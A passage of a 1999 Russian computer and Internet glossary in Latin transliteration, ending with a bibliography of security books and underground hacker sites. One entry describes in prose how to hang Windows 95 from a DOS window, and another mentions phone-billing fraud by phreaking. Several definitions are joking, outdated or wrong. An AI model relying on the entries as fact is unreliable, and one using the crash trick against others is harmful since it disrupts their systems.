     To, chto sobstvenno, i obrazovyvaet gipertekstovuyu ssylku.
     Anonymous
     Odin iz metodov polucheniya dostupa k toj ili inoj informacii. Vy  mozhete
tol'ko kopirovat' fajly, peredavat' svoi -- net.
     ANSI
     American National Standards Institute.
     APM
     Advanced  Power  Management.  Usovershenstvovannoe  upravlenie  pitaniem
komp'yutera. Interfejs  programmnogo  obespecheniya,  pozvolyayushchij sisteme vesti
upravlenie elektropitaniem oborudovaniya personal'nogo komp'yutera.
     Arcade Game
     Komp'yuternaya igra, kak pravilo, s zhivym i bystrym scenariem.
     Archie
     Sistema, prednaznachennaya dlya poiska soderzhimogo FTP serverov.
     ARJ
     Populyarnaya v MS-DOS programma arhivirovaniya fajlov.
     Article
     Stat'ya, poslannaya v Usenet.
     AT-komandy
     Komandy nastrojki modema.
     Vydelennyj kanal
     Postoyannoe soedinenie, vsegda  pozvolyayushchee peredat' potok informacii ot
odnogo komp'yutera k drugomu.
     Authorization
     Pravo,  kotoroe daetsya pol'zovatelyu na tot ili inoj resurs komp'yuternoj
sistemy.
     AUTOEXEC.BAT
     Avtomaticheski  vypolnyaemyj  fajl  pri  zagruzke operacionnoj sistemy, v
kotorom soderzhitsya  nabor  special'nyh  komand, pozvolyayushchih skonfigurirovat'
sistemu pod te ili inye ustrojstva personal'nogo komp'yutera.
     Backbone
     Glavnaya vysokoskorostnaya magistral' Internet. Opornaya set' Internet!
     Background
     Fon. Zadnij plan okna graficheskoj operacionnoj sistemy.
     Backup
     Rezervnaya kopiya. Zapasnoj arhiv nekotoroj programmy.
     Bad Sector
     Isporchennyj klaster.  Sektor  na  zhestkom  ili  gibkom  diske,  kotoryj
neprigoden dlya zapisi i hraneniya informacii.
     BAT
     Rasshirenie ispolnyaemyh fajlov.
     Baud rate
     Skorost' obmena dannymi mezhdu komp'yuterom i modemom.
     BBS
     Bulletin  Board System. Tip komp'yuternogo servisa. YUzery mogut chitat' i
publikovat' razlichnye soobshcheniya. Peredavat' ili skachivat' fajly.
     Benchmark
     Obshchee  testirovanie  personal'nogo  komp'yutera posredstvom  special'noj
programmy.
     Big mail
     |lektronnaya pochta ogromnyh razmerov. Peredaetsya nekotorymi svolochami  v
kachestve mesti.
     BIOS
     Bazovaya sistema vvoda-vyvoda.  Paket programm, "vshityj" v  personal'nyj
komp'yuter. Pozvolyaet nastroit' rabotu razlichnyh ustrojstv sistemy.
     Bit
     Samoe malen'koe kolichestvo informacii, peredavaemoe po seti.
     Board
     |lektronnaya  montazhnaya plata, ispol'zuemaya  v  personal'nom komp'yutere.
Esli  na  etoj  plate raspolozhen  processor,  to ona nazyvaetsya  materinskoj
platoj.
     Bookmark
     Zakladka. Fajl  Gopher ili WWW. Informaciya v  etom fajle razmeshchena tak,
chto poluchit' dostup k zhelaemoj stranice mozhno bez dopolnitel'nogo serfinga.
     Boot Block
     Sektor   zhestkogo  ili  gibkogo  diska,  soderzhashchij   komandy  zagruzki
operacionnoj sistemy.
     Boot
     Zapusk personal'nogo komp'yutera.
     BPS
     Bit v sekundu. Velichina izmereniya skorosti peredachi dannyh cherez modem.
     Browser
     Nechto,  pohozhee na graficheskij interfejs. Pozvolyaet bluzhdat' po toj ili
inoj seti, ili iskat' sebe na opredelennoe mesto priklyuchenij.
     Bus
     SHina.  Razlichnye  soedineniya,  pozvolyayushchie   obmenivat'sya   informaciej
razlichnym elementam personal'nogo komp'yutera.
     Busy
     Modem soobshchaet o tom, chto liniya svyazi zanyata.
     Cabinet
     Fajl, kotoryj soderzhit odin ili neskol'ko szhatyh fajlov.
     Capacity
     Maksimal'naya skorost' peredachi dannyh.
     Card
     Adapter ili pechatnaya plata.
     Carrier
     Svyaz'. Nesushchaya. Opredelennyj signal, nesushchij dannye. Pochti to zhe samoe,
chto i connect.
     CATV
     Kabel'noe televidenie.
     CGI
     Common  Gateway Interface.  Nechto, napominayushchee  interfejs,  s  pomoshch'yu
kotorogo pishetsya soft dlya serverov Web.
     Channel
     Kanal svyazi mezhdu uzlami seti.
     Chat
     Odna iz form mezhsetevogo psihoza. Vy mozhete, sidya za ekranom komp'yutera
vesti interaktivnyj razgovor  so mnozhestvom analogichnyh yuzerov, sidyashchih, kak
pravilo, po tu storonu okeana. I kuda tol'ko smotrit FSB? Neponyatno.
     Check Box
     Flazhok v  vide krestika. Odin  iz mnogochislennyh  elementov graficheskoj
operacionnoj sistemy. Pozvolyaet vklyuchat' ili otklyuchat' to ili inoe dejstvie.
     Checkpoint
     Mesto, v kotorom to  ili inoe prilozhenie prekrashchaet rabotat' i nachinaet
opredelyat',   gde  i  v  kakoj  srede  ono   nahoditsya.  Odnoimennaya  firma,
proizvodyashchaya ves'ma populyarnuyu i bestolkovuyu programmu dlya zashchity Internet i
Intranet.
     Checksum
     Nekotoroe  znachenie,  kotoroe  harakterizuet  celostnost'   testiruemoj
informacii.
     Conferencing
     Cistema konferencij.
     CIX
     Commercial Internet Exchange. Torgovaya associaciya provajderov Internet.
     ClariNet
     Kommercheskaya set', rabotayushchaya v formate konferencij Usenet.
     Client
     Soft konkretnogo yuzera.
     CLI v okne Dos
     Dypa v Windows 95. VMM ne virtualiziruet IF v VDM. Prosto  osushchestvlyaem
zapret   na   preryvaniya   i  perehodim   v  beskonechnyj  cikl.  Planirovshchik
blokiruetsya. Sistema zavisaet.
     Command line
     Komandnaya stroka.
     Compress
     Arhivator. To, chto delaet iz bol'shogo fajla malen'kij, a iz kuchi fajlov
--  odin  fajl.  Mozhet byt'  takzhe komandoj UNIX,  cherez kotoruyu  proishodit
process arhivirovaniya.
     Compression/Decompression
     Kodirovanie/dekodirovanie signalov.
     CompuServe
     Kommercheskaya komp'yuternaya set' SSHA.
     Cookies
     Tehnologiya, pozvolyayushchaya sohranyat'  sugubo individual'nuyu  informaciyu  o
pol'zovatele seti.
     Cracker
     Haker, kotoryj lomaet vse i vsya.
     Cross-posting
     Otpravlenie stat'i odnovremenno v neskol'ko grupp konferencij Usenet.
     Cybermall
     |lektronnyj magazin.
     Cyberpunk
     Samoutverzhdennyj haker.
     Cybersex
     Ceks, razvrat i drugie izvrashcheniya, dostupnye v Internet.
     Data compression
     Szhatie dannyh.
     Data link
     Kanal svyazi.
     Datagram
     Datagramma.   Soobshchenie,   posylaemoe  cherez  komp'yuternuyu   sistemu  s
kommunikaciej paketov.
     DDE
     Dynamic   Data  Exchange.  Mezhprocessornyj  metod   svyazi,  pozvolyayushchij
odnovremenno zapuskat' dve ili neskol'ko programm.
     DejaNews
     Ishchem  novosti v  konferenciyah Usenet po  klyuchevomu slovu, avtoru stat'i
ili po adresu. Dostup cherez http://www.dejanews.com.
     Dialtone
     Dlinnyj gudok. Telefonnaya liniya gotova.
     Dial-up user
     Pol'zovatel' kommutiruemoj linii. Poluchaet dostup k seti cherez modem.
     Dial-up
     Metod,  kodiruyushchij  dannye, a zatem  otpravlyayushchij ih  po  seti.  Imenno
posredstvom  etogo metoda i osushchestvlyaetsya  modemnaya  svyaz'  po obyknovennoj
telefonnoj linii.
     DirectX
     Programmnyj   interfejs,   blagodarya   kotoromu   vashi   mul'timedijnye
ustrojstva mogut rabotat' na bolee vysokom i effektivnom urovne.
     PPTP
     Point-to-Point    Tunneling   Protocol.   Blagodarya   protokolu    PPTP
(Point-to-Point  Tunneling  Protocol)  vy mozhete  podklyuchat'sya  k  Internet,
sovershenno ne zabotyas' o plate za mezhdugorodnyuyu svyaz'.
     DNS
     Domain Name System. Domennaya  sistema adresacii. Nechto, pohozhee na bazu
dannyh i konvertiruyushchee bukvennoe setevoe  imya v nabor cifr. |tot nabor cifr
yavlyaetsya  chislovym adresom Internet. Ponyaten  tol'ko komp'yuteram i nekotorym
fanatam s shizofrenicheskoj pamyat'yu.
     Domain Name Server
     Imya  servera  domena. Kazhdoe podrazdelenie  Internet imeet  dva domena.
Osnovnoj DNS obychno raspolagaetsya na setevoj mashine.
     DNS-servera ispol'zuyut v  svoih obrashcheniyah k udalennym uzlam  32-bitnye
adresa IP, mnemonicheski zaklyuchennye v chetyrehrazryadnuyu bukvennuyu kombinaciyu.
Lyuboj host  mozhet  poluchit' sootvetstvuyushchij DNS u blizhajshego informacionnogo
servera  DNS po izvestnoj sisteme Domain  Name Server cherez setevoj protokol
DNS. Prosto host  posylaet  zapros na  izvestnyj  IP-adres DNS-servera  svoj
IP-adres  i  imya  servera.  Server  DNS shtudiruet  sobstvennuyu  bazu dannyh,
nahodit  IP-adres  i  otpravlyaet  na host  sootvetstvuyushchij otvet  DNS. Shema
ves'ma  primitivnaya.  Esli  zhe  server  DNS  ne  nahodit  iskomuyu  bukvennuyu
kombinaciyu,  to  on  otsylaet  zapros  na  tak  nazyvaemyj kornevoj  server,
kotoryj, v svoyu  ochered', sveryaet informaciyu s  fajlom  nastroek root.cache.
Tak proishodit do teh por, poka imya hosta ne budet najdeno v Internet.
     Domain
     Podrazdelenie Internet.  U  kazhdogo  domena  est' svoya metka.  Naprimer
metki  .com,  .net,  .mil,  .org  oznachayut,  chto  eto  sootvetstvenno  domen
kommercheskoj, setevoj, voennoj i obshchestvennoj organizacii.
     Download
     Zakachivanie softa s drugogo komp'yutera na sobstvennyj vinchester.
     E-mail
     |lektronnaya  pochta. Vy pishite (nabivaete na  klaviature) pis'mo, adres,
zhmete  knopku  i  pochti  momental'no  vashe  poslanie  chitaet  adresat.  Veshch'
klassnaya.  No  est'   i  svoi  nedostatki.  Vashe  poslanie  mozhet  prochitat'
prakticheski lyuboj  yuzer,  hot'  nemnogo  znayushchij  netradicionnyj  soft.  Pro
hakerov voobshche mozhno promolchat'.
     Ethernet
     Odin iz vidov  seti s ves'ma klassnoj propusknoj sposobnost'yu. Dovol'no
chasto  komp'yutery, ispol'zuyushchie protokoly  TCP/IP podsoedinyayutsya  k Internet
cherez Ethernet. Da kakaya tam poeziya! Proza, suhaya proza.
     F2F
     Face to face. Licom k licu. Nezabyvaemaya vstrecha dvuh yuzerov Internet v
real'nom mire.
     Firewall
     Mezhsetevoj zashchitnyj ekran.  Ves'ma tumannaya veshch' dlya  nekotoryh prostyh
yuzerov  i  sovershenno  neponyatnaya  mnogim sistemnym  administratoram.  Veshch',
kotoruyu horosho znayut hakery. Dovol'no bestolkovaya  shtuchka, kotoraya, po idee,
dolzhna  zashchishchat'  sistemu  ot  proniknoveniya  hakerov.   Prakticheski   lyuboj
sovremennyj  mezhsetevoj  zashchitnyj ekran stroitsya  na  protokolah prikladnogo
urovnya (proxy) i podderzhivaet TELNET, Rlogin, FTP, SMTP, POP3, HTTP, Gopher,
X11, LP, Rsh, Finger, NNTP, Whois i RealAudio.
     Flame War
     Nanesennoe v dannyj moment elektronnoe oskorblenie. A ved' nedopustimo,
gospoda, narushat' poryadok v interaktivnom seanse raboty v seti!
     Flame
     Proiznositsya kak flejm.  Ugroza ili oskorblenie v elektronnom vide,  t.
e. po pochte ili v konferenciyah Usenet. A Vas oskorblyali v elektronnoj forme?
     Follow up
     Coobshchenie v Usenet, kak reakciya na ranee pomeshchennoe soobshchenie.
     FSF
     Free Software Foundation. Fond besplatnogo programmnogo obespecheniya.
     FSP
     Sistema peredachi fajlov, podobnaya FTP.
     FTP
     File  Transfer Protocol. Metod  peresylki  fajlov  na vash komp'yuter.  V
Internet imeyutsya tysyachi mest, podderzhivayushchih etot metod. Inogda edinstvennaya
vozmozhnost' zaimet'  fajl -- eto vospol'zovat'sya  protokolom FTP. Pomnite ob
etom protokole.
     FTP-client
     Soft pozvolyayushchij vam prikonnektit'sya k serveru FTP.
     FTP-komandy
     Komandy s sintaksisom FTP.
     FTP-mail
     Krutejshaya  shtuchka.   Vy  mozhete  poluchat'  fajly   s  serverov  FTP  po
elektronnoj pochte.
     FTP-server
     Komp'yuter bitkom nabityj vsyakoj vsyachinoj i podderzhivayushchij protokol FTP.
     Gateway
     Mezhsetevoj shlyuz. Nechto soedinyayushchee nesovmestimye seti.
     Get a life
     CHudak,  spustis' na zemlyu! Vosklicanie normal'nogo cheloveka, uvidevshego
fanata Internet.
     GIF
     Graphic Interchange Format. Odin iz standartnyh graficheskih fajlov WWW.
     Gophermail
     Dostup k Gopher cherez elektronnuyu pochtu.
     GUI
     Graphical  User  Interface.  Graficheskij  pol'zovatel'skij   interfejs.
Naprimer, sistema Macintosh ili Windows.
     Guru
     Fanat, professional. Otlichaetsya ot  hakera bezumnymi postupkami.  Takie
lyudi  mogut legko  vzorvat'  planetu,  esli  doberutsya do  zavetnoj  krasnoj
knopki.
     Hacker
     Ochen'  umnyj  chelovek.  Tot,  kto  vzlamyvaet seti.  |tot  umnik  mozhet
proniknut'  v  lyubuyu set'.  Delaetsya eto raznymi sposobami. Naprimer,  cherez
port terminala ili port elektronnoj pochty. Vybrav zhertvu, haker prezhde vsego
opredelyaet, imeyutsya li na  servere plohie paroli, ploho nastroennyj soft ili
isporchennaya operacionka. Zatem vybiraet metod sobstvennoj bezopasnosti.
     Haker --  eto chelovek,  kotoromu  interesnee sozdat'  svoe  sobstvennoe
programmnoe  obespechenie, chem pol'zovat'sya  uzhe sushchestvuyushchim. Hotya  sredstva
massovoj informacii pytayutsya prevratit' hakerov v prestupnye umy, obychno oni
yavlyayutsya lyud'mi, dvizhimymi lyubopytstvom i sobstvennymi interesami k sozdaniyu
programm, zastavlyayushchih komp'yuter rabotat' luchshe.
     Home
     Absolyutno    neponyatnaya    veshch'.    Navernoe,     pridumana    setevymi
administratorami dlya zaputyvaniya novichkov. V Internet tonny stranic. Poetomu
delat' kakuyu-to iz nih svoej domashnej dovol'no bessmyslenno. Da prostyat menya
pol'zovateli America Online!
     Host
     Glavnyj komp'yuter. Komp'yuter, neposredstvenno podklyuchennyj k Internet.
     Hotlist
     Goryachij spisok.
     HTML
     HyperText  Markup   Language.   YAzyk,  lezhashchij  v  osnove  formirovaniya
dokumentov World Wide Web.
     HTTP
     HyperText Transport  Protocol.  Sistema, peredayushchaya dokumenty  HTML  po
World Wide Web.
     Hub
     Koncentrator.
     Hyper Terminal
     Programma  svyazi, s  pomoshch'yu kotoroj vy smozhete organizovat' soedinenie
cherez modem mezhdu dvumya komp'yuterami po telefonnoj linii.
     Hyperlink
     Svyaz' mezhdu vami i gospodinom na tom beregu okeana.
     Hypermedia
     Gipersreda. CHerez opredelennye ssylki svyazyvaetsya tekst, grafika, zvuk,
video i kartinki.
     Hypermedia
     Nechto,  kotoroe horosho  znayut hakery.  Grubo  govorya to, chto  diskretno
mozhet otobrazit' fotografiyu na vybrannom vami web-obozrevatele.
     Hypertext
     Nechto   predstavlyayushchee  dannye  tak,  chto   mozhno  legko   organizovat'
mezhstranichnye svyazi razlichnyh dokumentov Internet.
     Inbox
     |lektronnyj pochtovyj yashchik.
     Internet
     Mirovaya  s  angloyazychnym  uklonom svobodnaya  konfederaciya  komp'yuternyh
setej,  ob®edinyayushchaya bolee  12 tysyach lokal'nyh  setej, bolee odnogo milliona
komp'yuterov i okolo 30 millionov yuzerov. Neglasnyj pobeditel' FIDO.
     IP Address
     Tridcatidvuhbitovyj   (nu   i  slovechko)   adres  protokola   Internet,
vklyuchayushchij v sebya nomer uzla i seti.
     IP
     Samyj vazhnyj  iz vseh protokolov, na  kotorom osnovana  Internet. CHerez
etot protokol osushchestvlyaetsya pryamoe podklyuchenie k Internet.
     IRC
     Internet Relay Chat. Odna iz form WWW-psihoza.
     IRC chem-to napominaet rabotu v  konferenciyah  Usenet.  No  esli  tam vy
obshchaetes' ne v real'nom vremeni,  to  zdes' mozhet  vestis'  zhivoj  razgovor.
Razve  chto, -- vas nikto ne slyshit. Vas mogut prochitat'.  Vy nabivaete tekst
na klaviature. Vasha informaciya  popadaet na obshchij displej.  Razlichnye gruppy
vidyat vash bred. Esli interesno -- otvechayut.
     IRQ
     Preryvanie.
     ISDN
     Integrated   Switched   Digital   Network.  Vysokoskorostnaya   cifrovaya
telefonnaya sistema. Tozhe ne dlya nas.
     ISP
     Internet Service Provider. To zhe, chto i provajder.
     Killfile
     Fajl,  fil'truyushchij stat'i konferencij Usenet.  Svoeobraznaya elektronnaya
cenzura.
     Knowbot
     Sluzhba, pozvolyayushchaya iskat' knigi v elektronnyh bibliotekah.
     Lamer
     YUzer-idiot.    Termin,     pridumannyj     amerikanskimi     sistemnymi
administratorami.
     LAN
     Local Area Network. Lokal'naya vychislitel'naya set'.
     ListServ
     Besplatnyj  soft, pozvolyayushchij  vam cherez spiski  rassylki avtomaticheski
dostavlyat' i kontrolirovat' elektronnuyu pochtu.
     Login
     Registracionnoe imya pol'zovatelya.
     Lurk
     Passivnye  nablyudateli.   Naprimer,   te,  kto  tol'ko  chitayut  novosti
konferencij Usenet ili soobshcheniya, prohodyashchie po kanalam IRC.
     Mail server
     Pochtovyj server. Komp'yuter, obrabatyvayushchij elektronnuyu pochtu.
     Mail
     Obmen  chastnymi  tekstovymi  soobshcheniyami   v   Internet  ili  v  drugoj
komp'yuternoj seti.
     Mailing list
     Cpisok  rassylki elektronnyh pochtovyh soobshchenij,  klassificirovannyh po
opredelennym temam. Svoeobraznaya podpiska.
     Marquee
     Begushchaya stroka v dokumente HTML.
     Media
     Pochti to zhe, chto Multimedia.
     MIME
     Multipurpose Internet Mail Extensions. Protokol peredachi zvuka, grafiki
i drugih dvoichnyh dannyh. Primenyaetsya pri peredache pochtovyh soobshchenij. I kak
tol'ko etot MIME ne interpretiruyut!
     MNP
     Microsom Networking Protocol. Protokol korrekcii oshibok.
     Modem
     MODulator/DEModulator. Ustrojstvo,  peredayushchee cifrovuyu  informaciyu  po
obyknovennoj telefonnoj linii.
     Moose
     Odna iz grupp konferencij Usenet. Lider gruppy -- nekto Uil'yam Kassidi.
     Mosaic
     Drevnejshij    graficheskij   pol'zovatel'skij   interfejs,   pozvolyayushchij
prosmatrivat'  World  Wide  Web.  Imeyutsya  versii  dlya  X-Window, Windows  i
Macintosh.
     MPEG
     Moving Pictures  Expert  Group. Protokol,  cherez kotoryj  upakovyvayutsya
videozapisi.
     Multimedia
     Ves'ma tumannyj termin, ne perevodyashchijsya na normal'nyj yazyk.
     Net server
     Setevoj server.
     Net
     Set'.
     Net.god
     Bog Seti setej.
     Net.personality
     Krutoj uchastnik konferencij Usenet.
     Netiquette
     Cetevoj etiket, otnosyashchijsya k uchastnikam konferencij Usenet.
     Newcomer
     Novoispechennyj yuzer Internet.
     Newsgroup
     Oblast' soobshchenij v konferenciyah Usenet.
     NNTP
     Setevoj protokol, s pomoshch'yu kotorogo ves' mir pol'zuetsya prelestyami  ot
konferencij Usenet.
     No Dialtone
     Soobshchenie modema. V linii otsutstvuet signal.
     Node
     Uzel seti.
     NTFS
     Fajlovaya sistema,  special'no  razrabotannaya dlya  operacionnoj  sistemy
Windwos NT. Podderzhivaet vosstanovlenie fajlovoj  sistemy i  nositeli dannyh
ves'ma bol'shogo ob®ema.
     OBS
     Online Bookstore. |lektronnaya biblioteka.
     Offline
     Avtonomnyj rezhim raboty komp'yutera.
     Online
     Interaktivnyj rezhim raboty setevogo komp'yutera.
     Password
     Parol'.  Golovnaya  bol'  mnogih  sistemnyh  administratorov. Mozol'  na
pal'cah prostyh yuzerov.
     PH
     Phonebook. Programma-klient PH  mozhet  byt'  ispol'zovana dlya dostupa k
baze dannyh QI, v kotoroj  nahodyatsya tonny  telefonnyh spravochnikov  i massa
drugoj poleznoj informacii.
     Phreake
     Hakerstvo na telefonnyh  liniyah. Generaciya tonov opredelennoj  chastoty,
pozvolyayushchaya  provodit'  mahinacii   s  oplatoj  razgovorov   i  skanirovanie
telefonnoj seti na predmet obnaruzheniya modemnyh vhodov.
     PKZIP
     Programma upakovki fajlov.
     Pointer
     Ukazatel' s sintaksisom URL.
     POP
     Post Office Protocol. Protokol elektronnoj pochty.
     Popmail
     Programma, ispol'zuemaya dlya chteniya udalennyh pochtovyh soobshchenij.
     Posting
     Peredacha soobshcheniya v odnu iz grupp Usenet.
     PPP
     Point-to-Point-Protocol.  Protokol  povyshennogo tipa.  Naslednik  SLIP.
|tot  protokol  horosh tem,  chto  on  pozvolyaet  podklyuchit' vash  komp'yuter  k
Internet po tak nazyvaemomu protokolu udalennogo dostupa TCP/IP.
     Privacy
     Nevmeshatel'stvo v lichnuyu zhizn' pol'zovatelya elektronnoj pochty.
     Prompt
     Pole dannyh udalennogo terminala.
     Protocol
     Metod, s pomoshch'yu kotorogo peredaetsya informaciya ot hosta k yuzeru.
     Provider
     Postavshchik nekotoryh uslug. V chastnosti, -- uslug Internet.
     Pulse
     Odin iz sposobov impul'snogo nabora telefonnogo nomera.
     QWK
     Format  chteniya  v  interaktivnom  rezhime  pochtovyh  soobshchenij  i statej
konferencij Usenet.
     Real Time
     Interaktivnyj  (ne  paketnyj)   rezhim.  To  est'  rezhim,  peredayushchij  i
obrabatyvayushchij informaciyu s ves'ma bol'shoj skorost'yu.
     Remote computer
     Tot samyj server, k kotoromu konnektyatsya.
     Remote control
     Distancionnoe upravlenie.
     Remote
     Udalennyj dostup.
     RFC
     Request  For  Comment.  Ogromnaya kucha  elektronnyh dokumentov.  Esli ee
razgresti, to mozhno okonchatel'no vyyasnit', chto zhe takoe Internet.
     RIP
     Routing  Internet  Protocol.  Eshche  odin  protokol,  v  debryah  kotorogo
zaputalos' nemalo sistemnyh administratorov.
     Ripco
     Populyarnyj provajder iz slavnogo amerikanskogo goroda CHikago.
     Robot
     Robot, on  i v  Afrike robot. Nechto, avtomaticheski zalezayushchee  v  chuzhuyu
set' bez uchastiya sistemnyh administratorov ili nekotoraya poiskovaya programma
v gipersrede WWW.
     Router
     Marshrutizator.
     RTFM
     Read The Following Materials. CHitaj spravochnik,  pridurok! Razdrazhennyj
otvet,  adresovannyj, kak  pravilo  tem  yuzeram,  kotorye  zadayut  ochevidnye
voprosy.
     Script
     Scenarij v nekotoroj kommunikacionnoj programme.
     Security
     Antihakerskij soft. Sladkaya yagodka sistemnogo administratora.
     Server
     Komp'yuter, sistema kotorogo sposobna organizovat' set'.
     SGML
     Standard Generalized Markup Language. YAzyk strukturirovannyh yazykov. To
est' yazyk,  posredstvom kotorogo  vy  mozhete opredelit' yazyk indeksirovannyh
dokumentov.  YAzyk bolee vysokogo  urovnya,  chem HTML.  V obshchem,  yazyk yazykov.
Ponyaten tol'ko ves'ma umnym yuzeram ili hakeram.
     Shareware
     Uslovno-besplatnoe  programmnoe  obespechenie, t. e. platite lish'  v tom
sluchae, esli hotite poluchit' polnuyu versiyu poluchennogo softa.
     Sharing
     Sovmestnoe ispol'zovanie.
     Shell
     Obolochka.
     Site
     Mesto. Raspolozhenie servera v Internet.
     SLIP
     Serial  Line Internet  Protocol.  Drevnij  protokol  povyshennogo  tipa.
Pozvolyaet  podklyuchit'  vash  komp'yuter k  Internet  po  protokolu s udalennym
dostupom TCP/IP.
     SMTP
     Simple Mail Transport Protocol. Protokol obmena pochtovymi soobshcheniyami.
     Spam
     Prinuditel'nye   soobshcheniya,   posylaemye  cherez  elektronnuyu   pochtu  i
konferencii Usenet.
     SSL
     Secure   Socket  Layer.  Ves'ma  slabyj  protokol  programmy  Netscape.
Prednaznachen dlya  zashchity yuzerov. Ili  po drugomu:  zashchishchennyj protokol samoj
klassnoj i znamenitoj smotrelki kiberprostranstva Netscape Communicator.
     Sysop
     System operator. Sisop. Sistemnyj operator.
     TCP
     Transmission  Control Protocol. Glavnyj transportnyj protokol. Protokol
upravleniya peredachej. Rabotaet odnovremenno s klientom  i protokolom nizkogo
urovnya (IP).  Interfejs mezhdu TCP i pol'zovatelem  est' otkrytie  i zakrytie
soedineniya i otpravka i zagruzka informacii. TCP sovmestim s Telnet i THP.
     TCP/IP
     Control   Protocol/Internet  Protocol.  Standartnyj  setevoj  protokol,
pozvolyayushchij vashemu komp'yuteru soedinit'sya s Internet.
     Telnet
     Special'nyj kommunikacionnyj  protokol,  pozvolyayushchij cherez opredelennye
komandy poluchat' neposredstvennyj dostup k serveru Internet.
     Tone
     Tonovyj nabor telefonnogo nomera.
     Traffic
     Potok.
     Twisted pair
     Skruchennaya para.
     UDP
     Protokol  transportnogo  urovnya,  na  kotorom   sobstvenno  i  osnovana
Internet.
     Upload
     Vy peredaete svoi fajly na drugoj komp'yuter.
     URL
     Uniform Resource Locator. Standartnyj adresnyj format,  ukazyvayushchij imya
servera Gopher, WWW, Finger ili FTP.
     USB
     Universal'naya posledovatel'naya shina. Blagodarya USB vam bol'she ne  nuzhno
zadumyvat'sya ob ustanovkah preryvanij IRQ. Vy prosto podklyuchaete  ustrojstvo
k raz®emu  USB, a sistema  sama obespechit sovmestimost' s vashim komp'yuterom.
Vam dazhe ne pridetsya perezapuskat' sistemu.
     AGP
     Arhitektura graficheskih uskoritelej AGP  (Accelerated  Graphics  Port).
Blagodarya AGP  vy mozhete vpolnoj mere nasladit'sya trehmernymi  komp'yuternymi
igrami  ili  oshchutit' vsyu  moshch'  vashego  novogo  videoadaptera  v  programmah
obrabotki trehmernoj grafiki.
     Usenet
     Odna iz form massovogo elektronnogo psihoza (v horoshem smyle poslednego
slova). V nastoyashchee vremya sushchestvuet okolo 10 000 takih form.
     User node
     Uzel pol'zovatelya.
     Username
     Imya pol'zovatelya.
     WAN
     Wide Area Network.  Set'  setej.  Naprimer, Internet yavletsya  Worldwide
WAN.
     Webmaster
     Sistemnyj administrator Web-servera. On zhe, Pautinych.
     WDM
     Arhitektura  drajverov  Win32  (po suti  ob®edinyaet  apparatnye resursy
Windows  98 i  Windows NT),  blagodarya  kotoroj  vy mozhete  nastraivat' svoyu
sistemu, ispol'zuya drajvery Windows NT.
     White Pages
     Spravochnik pol'zovatelej Internet.
     Whois
     Ishchem elektronnyj adres konkretnogo tipa.
     WINZIP
     Soft, sozdannyj  dlya  yuzerov  Windows  95.  Pozvolyaet  raspakovyvat'  i
zapakovyvat' fajly.
     Workstation
     Rabochaya stanciya. Odin iz komp'yuterov, podklyuchennyj k komp'yuternoj seti.
     World Wide Web
     Informacionnaya sistema  Internet,  sozdannaya  dlya  teh  yuzerov, kotorye
imeyut vysokoskorostnye modemy. |to oznachaet, chto na ekrane vashego komp'yutera
viden ne prosto golyj tekst, a mul'timedijnyj dokument  s  kartinkami, poroj
razvorachivayushchimisya tak dolgo, chto hochetsya stuknut' po klaviature ili plyunut'
na ekran monitora.
     Yahoo
     Pauk s samym polnym  spiskom  serverov  WWW  i vozmozhnost'yu  besplatnoj
registracii sobstvennoj Web stranicy (http://www.yahoo.com).
     ZIP
     Populyarnyj format arhivirovaniya  fajlov. Naibolee chasto  ispol'zuetsya v
programmah MS DOS.
     Spisok ispol'zovannoj literatury
     Russian Underground Club
     http://www.toptown.com/hp/RUC/
     e-mail: night_elf@hotmail.com
     Russian Underground Server
     http://www.russian.lt/
     Kryaker Internet
     http://kpakep.home.ml.org/
     ThE BLUES BROThERS BBS
     +7-812-178-8403
     Kak ne platit' MGTS za povremenku
     Master A. Pixel (SLY FOX)
     Modemy
     Master A. Pixel (SPY FOX)
     Verstak. ZHurnal russkogo hakera.
     http://www.chat.ru/~wrkbench/1000.html
     Computer Security Basics
     Deborah Russell and G.T. Gengemi Sr
     Information Systems Security
     Philip Fites i Martin Kratz
     Computer Related Risks
     Peter G. Neumann
     Computer Security Management
     Karen Forcht
     The Stephen Cobb Complete Book of PC and LAN Security
     Stephen Cobb
     Security in Computing
     Charles P. Pfleeger
     Building a Secure Computer System
     Morrie Gasser
     Modern Methods for Computer Security
     Lance Hoffman
     Protection and Security on the Information Superhighway
     Dr. Frederick B. Cohen
     Practical Unix Security
     Simson Garfinkel and Gene Spafford
     Unix System Security
     Rik Farrow
     Unix Security: A Practical Tutorial
     Derek Arnold
     Unix Security for the Organization
     Richard Bryant
     Network Security Secrets
     David J. Stang i Sylvia Moon
     Complete Lan Security and Control
     Peter Davis
     Network Security
     Steven Shaffer i Alan Simon
     Protect Your Privacy: A Guide for PGP Users
     William Stallings
     Codebreakers
     Kahn
     The Little Black Book of Computer Viruses
     Mark Ludwig
     Computer Viruses, Artificial Life and Evolution
     Mark Ludwig
     A Short Course on Computer Viruses
     Dr. Fred Cohen
     Engineering and Operations in the Bell System
     R.F. Rey
     Telephony: Today and Tomorrow
     Dimitris N. Chorafas
     The Hacker Crackdown
     Bruce Sterling
     Cyberpunk
     Katie Hafner i John Markoff
     The Cuckoo's Egg
     Cliff Stoll
     Hackers: Heroes of the Computer Revolution
     Steven Levy

Last-modified: Mon, 16 Aug 1999 18:47:43 GMT
Ocenite etot tekst: